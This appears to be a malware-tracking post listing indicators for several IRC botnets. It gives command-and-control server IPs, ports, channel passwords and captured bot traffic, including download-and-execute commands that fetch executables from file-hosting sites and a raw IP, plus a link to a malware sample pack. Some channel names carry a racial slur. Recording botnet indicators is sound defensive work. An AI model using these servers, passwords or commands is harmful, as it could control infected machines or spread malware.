Remote Host Port Number
46.105.164.74 2109
46.105.164.74 8782
NICK [USA|635435]
USER 8770 “” “lol” :8770
JOIN #moo
PONG :Threat-Expert.net
NICK {iNF-00-USA-XP-COMP-7188}
JOIN #hold nigger
PONG Threat-Expert.net
USER blaze * 0 :COMP
hosting infos: http://whois.domaintools.com/46.105.164.74
64.34.200.181 (irc botnet hosted in United States Newhall Serverbeach)
Remote Host Port Number
195.122.131.13 80
204.0.5.41 80
63.135.80.224 80
63.135.80.46 80
64.34.200.181 1234 PASS xxx
NICK NEW-[USA|00|P|99411]
USER XP-0024 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|99411] -ix
JOIN #!nw! test
PONG 22 MOTD
hosting infos: http://whois.domaintools.com/64.34.200.181
208.117.34.213 (ngrBot hosted in United States Laird Hill Steadfast Networks)
Remote Host Port Number
199.101.133.144 80
199.101.133.25 80
199.15.234.7 80
208.117.34.213 1888 PASS ngrBot
PRIVMSG #XP :[d=”http://dc387.4shared.com/download/k1pyhC72/robertiniii.exe” s=”81920 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\2.exe” – Download retries: 0
NICK n{US|XPa}mgycnpm
USER mgycnpm 0 0 :mgycnpm
JOIN ##center 1963.g3rb3rs1t0.3691
JOIN #XP
JOIN #US
PRIVMSG #XP :[d=”http://dc355.4shared.com/download/dPl-t_0P/fdbfdf542.exe” s=”167936 bytes”] Updated bot file “C:\Documents and Settings\UserName\Application Data\Ldxaxl.exe”
bugazi.zapto.org (irc botnet hosted in United Kingdom Maidenhead Simply Transit Ltd)
bugazi.zapto.org DNS_TYPE_A 213.229.78.226
Remote Host Port Number
213.229.78.226 1244
Channels: 4 channels formed
Clients: I have 325 clients and 0 servers
Local users: Current Local Users: 325 Max: 550
Global users: Current Global Users: 325 Max: 550
NICK new[iRooT-XP-USA]557688
USER 1754 “” “TsGh” :1754
PONG :65FDE65C
JOIN #bugazi# aalbaklub1
PONG :HTTP1.4
hosting infos: http://whois.domaintools.com/213.229.78.226
78.47.197.2 (irc botnet hosted in Germany Potsdam Hetzner Online Ag)
Remote Host Port Number
199.15.234.7 80
78.47.197.2 7200 PASS cheese or PASS gBot
NICK New{US-XP-x86}3313868
USER 9317 “” “9130” :25529
MODE New{US-XP-x86}3313868 3qUu
JOIN #Erection#
NICK n{US|XPa}wdvgswy
USER wdvgswy 0 0 :wdvgswy
JOIN #nig# cheese
JOIN #gBot# Channelisr00t
hosting infos: http://whois.domaintools.com/78.47.197.2
Around 35mb malware samples
Here again with another package from different malwares. Download: http://adf.ly/2QFHX
Darkside.GoV [Crew] (irc bot hosted in United States Clarks Summit Volumedrive)
Remote Host Port Number
199.168.142.118 24789
NICK {US| |nwytlmh}
USER UserName “” “879968799” :879968799
MODE {US| |oapbhdh}
hosting infos: http://whois.domaintools.com/199.168.142.118
www.facebookvideocentral.com (irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
Resolved : [www.facebookvideocentral.com] To [46.45.164.229]
Remote Host Port Number
46.45.164.229 80
NICK 0USAicqigqz
JOIN #unk2 ….
USER yztwfqz * 0 :yztwfqz
MODE 0USAicqigqz -ix
Now talking in #unk2
Topic On: [ #unk2 ] [ ]
Topic By: [ j ]
Now talking in #unk3
Topic On: [ #unk3 ] [ .down http://46.45.164.228/t4.exe c:48o9o8k8s3i8.exe.exe 1 ]
ithiroba.jp (irc botnet hosted in Japan Tokyo Hatakeyama Noboru)
Resolved : [ithiroba.jp] To [210.162.102.26]
Remote Host Port Number
210.162.102.26 6969
NICK {NEW}[USA][XP]161730
USER 4197 “” “lol” :4197
JOIN #spmx
PONG :fatalz.net
hosting infos: http://whois.domaintools.com/210.162.102.26
alfaroooq.com (ngrBot hosted in United States New York Dnsslave.com)
Remote Host Port Number
173.0.59.37 3922 PASS 441
199.15.234.7 80
67.225.136.187 80
NICK n{US|XPa}pzammgy
USER pzammgy 0 0 :pzammgy
JOIN #alfa …
PRIVMSG #alfa :[DNS]: Blocked 1259 domain(s) – Redirected 0 domain(s)
hosting infos: http://whois.domaintools.com/173.0.59.37